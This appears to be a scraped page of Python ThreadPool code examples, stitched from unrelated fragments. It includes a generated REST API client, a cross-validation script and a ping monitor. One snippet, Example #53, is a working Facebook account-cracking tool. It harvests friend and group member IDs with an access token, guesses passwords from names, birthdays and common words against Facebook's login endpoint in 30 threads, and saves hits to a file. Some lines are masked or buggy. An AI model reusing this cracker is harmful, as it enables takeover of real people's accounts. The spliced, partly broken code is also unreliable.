        :param path_params: Path parameters in the url.
        :param query_params: Query parameters in the url.
        :param header_params: Header parameters to be
            placed in the request header.
        :param body: Request body.
        :param post_params dict: Request post form parameters,
            for `application/x-www-form-urlencoded`, `multipart/form-data`.
        :param auth_settings list: Auth Settings names for the request.
        :param response_type: Response data type.
        :param files dict: key -> filename, value -> filepath,
            for `multipart/form-data`.
        :param async_ bool: execute request asynchronously
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param collection_formats: dict of collection formats for path, query,
            header, and post parameters.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return:
            If the async_ parameter is True,
            the request will be executed asynchronously
            and the method will return the request thread.
            If async_ is False or missing,
            the method will return the response directly.
        """
        if not async_:
            return self.__call_api(resource_path, method, path_params,
                                   query_params, header_params, body,
                                   post_params, files, response_type,
                                   auth_settings, _return_http_data_only,
                                   collection_formats, _preload_content,
                                   _request_timeout)
        else:
            thread = self.pool.apply_async(
                self.__call_api,
                (resource_path, method, path_params, query_params,
                 header_params, body, post_params, files, response_type,
                 auth_settings, _return_http_data_only, collection_formats,
                 _preload_content, _request_timeout))
        return thread

    def request(self,
                method,
                url,
                query_params=None,
                headers=None,
                post_params=None,
                body=None,
                _preload_content=True,
                _request_timeout=None):
        """Makes the HTTP request using RESTClient."""
        if method == "GET":
            return self.rest_client.GET(url,
                                        query_params=query_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        headers=headers)
        elif method == "HEAD":
            return self.rest_client.HEAD(url,
                                         query_params=query_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         headers=headers)
        elif method == "OPTIONS":
            return self.rest_client.OPTIONS(url,
                                            query_params=query_params,
                                            headers=headers,
                                            post_params=post_params,
                                            _preload_content=_preload_content,
                                            _request_timeout=_request_timeout,
                                            body=body)
        elif method == "POST":
            return self.rest_client.POST(url,
                                         query_params=query_params,
                                         headers=headers,
                                         post_params=post_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         body=body)
        elif method == "PUT":
            return self.rest_client.PUT(url,
                                        query_params=query_params,
                                        headers=headers,
                                        post_params=post_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        body=body)
        elif method == "PATCH":
            return self.rest_client.PATCH(url,
                                          query_params=query_params,
                                          headers=headers,
                                          post_params=post_params,
                                          _preload_content=_preload_content,
                                          _request_timeout=_request_timeout,
                                          body=body)
        elif method == "DELETE":
            return self.rest_client.DELETE(url,
                                           query_params=query_params,
                                           headers=headers,
                                           _preload_content=_preload_content,
                                           _request_timeout=_request_timeout,
                                           body=body)
        else:
            raise ValueError("http method must be `GET`, `HEAD`, `OPTIONS`,"
                             " `POST`, `PATCH`, `PUT` or `DELETE`.")

    def parameters_to_tuples(self, params, collection_formats):
        """Get parameters as list of tuples, formatting collections.

        :param params: Parameters as dict or list of two-tuples
        :param dict collection_formats: Parameter collection formats
        :return: Parameters as list of tuples, collections formatted
        """
        new_params = []
        if collection_formats is None:
            collection_formats = {}
        for k, v in six.iteritems(params) if isinstance(
                params, dict) else params:  # noqa: E501
            if k in collection_formats:
                collection_format = collection_formats[k]
                if collection_format == 'multi':
                    new_params.extend((k, value) for value in v)
                else:
                    if collection_format == 'ssv':
                        delimiter = ' '
                    elif collection_format == 'tsv':
                        delimiter = '\t'
                    elif collection_format == 'pipes':
                        delimiter = '|'
                    else:  # csv is the default
                        delimiter = ','
                    new_params.append(
                        (k, delimiter.join(str(value) for value in v)))
            else:
                new_params.append((k, v))
        return new_params

    def prepare_post_parameters(self, post_params=None, files=None):
        """Builds form parameters.

        :param post_params: Normal form parameters.
        :param files: File parameters.
        :return: Form parameters with files.
        """
        params = []

        if post_params:
            params = post_params

        if files:
            for k, v in six.iteritems(files):
                if not v:
                    continue
                file_names = v if type(v) is list else [v]
                for n in file_names:
                    with open(n, 'rb') as f:
                        filename = os.path.basename(f.name)
                        filedata = f.read()
                        mimetype = (mimetypes.guess_type(filename)[0]
                                    or 'application/octet-stream')
                        params.append(
                            tuple([k, tuple([filename, filedata, mimetype])]))

        return params

    def select_header_accept(self, accepts):
        """Returns `Accept` based on an array of accepts provided.

        :param accepts: List of headers.
        :return: Accept (e.g. application/json).
        """
        if not accepts:
            return

        accepts = [x.lower() for x in accepts]

        if 'application/json' in accepts:
            return 'application/json'
        else:
            return ', '.join(accepts)

    def select_header_content_type(self, content_types):
        """Returns `Content-Type` based on an array of content_types provided.

        :param content_types: List of content-types.
        :return: Content-Type (e.g. application/json).
        """
        if not content_types:
            return 'application/json'

        content_types = [x.lower() for x in content_types]

        if 'application/json' in content_types or '*/*' in content_types:
            return 'application/json'
        else:
            return content_types[0]

    def update_params_for_auth(self, headers, querys, auth_settings):
        """Updates header and query params based on authentication setting.

        :param headers: Header parameters dict to be updated.
        :param querys: Query parameters tuple list to be updated.
        :param auth_settings: Authentication setting identifiers list.
        """
        if not auth_settings:
            return

        for auth in auth_settings:
            auth_setting = self.configuration.auth_settings().get(auth)
            if auth_setting:
                if not auth_setting['value']:
                    continue
                elif auth_setting['in'] == 'header':
                    headers[auth_setting['key']] = auth_setting['value']
                elif auth_setting['in'] == 'query':
                    querys.append((auth_setting['key'], auth_setting['value']))
                else:
                    raise ValueError(
                        'Authentication token must be in `query` or `header`')

    def __deserialize_file(self, response):
        """Deserializes body to file

        Saves response body into a file in a temporary folder,
        using the filename from the `Content-Disposition` header if provided.

        :param response:  RESTResponse.
        :return: file path.
        """
        fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
        os.close(fd)
        os.remove(path)

        content_disposition = response.getheader("Content-Disposition")
        if content_disposition:
            filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                                 content_disposition).group(1)
            path = os.path.join(os.path.dirname(path), filename)

        with open(path, "wb") as f:
            f.write(response.data)

        return path

    def __deserialize_primitive(self, data, klass):
        """Deserializes string to primitive type.

        :param data: str.
        :param klass: class literal.

        :return: int, long, float, str, bool.
        """
        try:
            return klass(data)
        except UnicodeEncodeError:
            return six.u(data)
        except TypeError:
            return data

    def __deserialize_object(self, value):
        """Return a original value.

        :return: object.
        """
        return value

    def __deserialize_date(self, string):
        """Deserializes string to date.

        :param string: str.
        :return: date.
        """
        try:
            from dateutil.parser import parse
            return parse(string).date()
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason="Failed to parse `{0}` as date object".format(string))

    def __deserialize_datatime(self, string):
        """Deserializes string to datetime.

        The string should be in iso8601 datetime format.

        :param string: str.
        :return: datetime.
        """
        try:
            from dateutil.parser import parse
            return parse(string)
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason=(
                    "Failed to parse `{0}` as datetime object".format(string)))

    def __deserialize_model(self, data, klass):
        """Deserializes list or dict to model.

        :param data: dict, list.
        :param klass: class literal.
        :return: model object.
        """

        if not klass.swagger_types and not hasattr(klass,
                                                   'get_real_child_model'):
            return data

        kwargs = {}
        if klass.swagger_types is not None:
            for attr, attr_type in six.iteritems(klass.swagger_types):
                if (data is not None and klass.attribute_map[attr] in data
                        and isinstance(data, (list, dict))):
                    value = data[klass.attribute_map[attr]]
                    kwargs[attr] = self.__deserialize(value, attr_type)

        instance = klass(**kwargs)

        if hasattr(instance, 'get_real_child_model'):
            klass_name = instance.get_real_child_model(data)
            if klass_name:
                instance = self.__deserialize(data, klass_name)
        return instance
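
A minimal usage sketch for the client above, assuming the generated package exposes Configuration and model classes alongside CloudApiClient; the endpoint path, the Device model, and the api_key auth setting below are illustrative placeholders rather than part of the generated code.

# Hypothetical usage of CloudApiClient.call_api (endpoint and model names are placeholders).
config = Configuration()
config.host = 'https://api.example.com/v1'        # assumed base URL
client = CloudApiClient(configuration=config)

# Synchronous call: returns the deserialized object directly.
devices = client.call_api(
    '/devices', 'GET',
    query_params=[('limit', 10)],
    response_type='list[Device]',                 # hypothetical model class name
    auth_settings=['api_key'],                    # assumed auth setting name
    _return_http_data_only=True)

# Asynchronous call: returns the internal ThreadPool's AsyncResult; .get() blocks for the value.
thread = client.call_api(
    '/devices', 'GET',
    response_type='list[Device]',
    auth_settings=['api_key'],
    _return_http_data_only=True,
    async_=True)
devices_async = thread.get()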
Exemple #50
    @classmethod
    def SetPorts(cls, ports: int):
        global __MAXPORT__  # assumes module-level port bounds; the original '==' was a no-op comparison
        __MAXPORT__ = __MINPORT__ + ports - 1
        cls.__pool = ThreadPool(__MAXPORT__ - __MINPORT__ + 1)
Exemple #51
def run():
    dev = ThreadPool(30)
    dev.map(pro_dev, users1)
                        default=3,
                        type=int,
                        help='number of folds for cross-validation')
    args = parser.parse_args()

    # get the command line arguments
    data_path = os.path.expanduser(args.data)
    num_folds = args.folds

    # load the data
    data = load_data(data_path)

    # create the folds
    folds = make_folds(data, num_folds)

    # create worker threads
    pool = ThreadPool(processes=num_folds)

    # fire up the workers
    classification_reports = pool.map(validate_with_fold_helper,
                                      zip(folds, repeat(data, num_folds)))

    pool.close()
    pool.join()

    for fold_number, report in enumerate(classification_reports, 1):
        print('******************fold_{}_results********************\n'.format(
            fold_number))
        print(report)
        print('****************************************************\n')
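
The worker passed to pool.map is not included in this snippet; the sketch below is purely hypothetical, assuming each fold is a ((train_X, train_y), (test_X, test_y)) pair and a scikit-learn style classifier. validate_with_fold_helper, load_data, and make_folds belong to the part of the example that is not shown, so this illustrates one plausible shape rather than the original implementation.

# Hypothetical worker for the pool.map call above.
from sklearn.metrics import classification_report
from sklearn.naive_bayes import MultinomialNB

def validate_with_fold_helper(fold_and_data):
    # pool.map passes a single argument, so unpack the (fold, full_data) tuple
    fold, _full_data = fold_and_data
    (train_X, train_y), (test_X, test_y) = fold   # assumed fold layout
    model = MultinomialNB()                       # placeholder classifier
    model.fit(train_X, train_y)
    predictions = model.predict(test_X)
    return classification_report(test_y, predictions)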
Exemple #53
def pilih_super():
    peak = raw_input("\n\033[1;97m >>> \033[1;97m")
    if peak == "":
        print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        idt = raw_input(
            "\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m " + op[
                "name"]
        except KeyError:
            print "\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
            raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
            super()
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "3":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        idg = raw_input(
            '\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
        try:
            r = requests.get('https://graph.facebook.com/group/?id=' + idg +
                             '&access_token=' + toket)
            asw = json.loads(r.text)
            print "\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m " + asw[
                'name']
        except KeyError:
            print "\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
            raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
            super()
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        re = requests.get(
            'https://graph.facebook.com/' + idg +
            '/members?fields=name,id&limit=999999999&access_token=' + toket)
        s = json.loads(re.text)
        for p in s['data']:
            id.append(p['id'])
    elif peak == "4":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        try:
            idlist = raw_input(
                '\x1b[1;96m[+] \x1b[1;93mMasukan nama file  \x1b[1;91m: \x1b[1;97m'
            )
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())
        except IOError:
            print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            super()
    elif peak == "0":
        menu()
    else:
        print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
        pilih_super()

    print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m" + str(
        len(id))
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print(
            "\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m" +
            o),
        sys.stdout.flush()
        time.sleep(1)
    print
    print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
    print 42 * "\033[1;96m="

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = b['first_name'] + '123'
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                    'name']
                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                        'name']
                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
                    cek = open("out/super_cp.txt", "a")
                    cek.write("ID:" + user + " Pw:" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = b['first_name'] + '12345'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                            'name']
                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                'name']
                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
                            cek = open("out/super_cp.txt", "a")
                            cek.write("ID:" + user + " Pw:" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = b['last_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                    'name']
                                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                        'name']
                                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
                                    cek = open("out/super_cp.txt", "a")
                                    cek.write("ID:" + user + " Pw:" + pass3 +
                                              "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = ['sayang'] + '02'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                            'name']
                                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                'name']
                                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
                                            cek = open("out/super_cp.txt", "a")
                                            cek.write("ID:" + user + " Pw:" +
                                                      pass4 + "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            birthday = b['birthday']
                                            pass5 = birthday.replace('/', '')
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                                    'name']
                                                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                        'name']
                                                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
                                                    cek = open(
                                                        "out/super_cp.txt",
                                                        "a")
                                                    cek.write("ID:" + user +
                                                              " Pw:" + pass5 +
                                                              "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = 'Sayang'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                                            'name']
                                                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                                'name']
                                                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
                                                            cek = open(
                                                                "out/super_cp.txt",
                                                                "a")
                                                            cek.write("ID:" +
                                                                      user +
                                                                      " Pw:" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
    print "\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m" + str(
        len(oks)) + "\033[1;97m/\033[1;93m" + str(len(cekpoint))
    print(
        "\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt"
    )
    raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
    super()
Exemple #54
    def run(self):
        if not self.items:
            return
        pool = ThreadPool(len(self.items))
        # Ping every item concurrently, then sleep for the configured refresh
        # interval (waking early if the stop event is set).
        while not self.stopEvent.isSet():
            pool.map(self.pingItem, self.items.values())
            self.stopEvent.wait(self.config.get('refresh'))
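The fragment above shows only the run() method. As a rough, self-contained sketch of the same ThreadPool-plus-Event polling pattern, something like the following could work; the Monitor class name, the items mapping, the pingItem placeholder, and the refresh default are assumptions added for illustration and are not part of the original snippet.

import threading
from multiprocessing.pool import ThreadPool


class Monitor(threading.Thread):
    """Sketch of a background poller; names and defaults are illustrative."""

    def __init__(self, items, refresh=5.0):
        super(Monitor, self).__init__()
        self.items = items          # assumed shape: {"name": "address", ...}
        self.refresh = refresh      # seconds between polling rounds (assumed)
        self.stopEvent = threading.Event()

    def pingItem(self, address):
        # Placeholder check; a real monitor would open a socket or shell out
        # to ping here instead of printing.
        print("pinging %s" % address)

    def run(self):
        if not self.items:
            return
        pool = ThreadPool(len(self.items))
        try:
            while not self.stopEvent.is_set():
                # Check all items concurrently, then wait until the next round
                # or until stop() wakes us early.
                pool.map(self.pingItem, self.items.values())
                self.stopEvent.wait(self.refresh)
        finally:
            pool.close()
            pool.join()

    def stop(self):
        self.stopEvent.set()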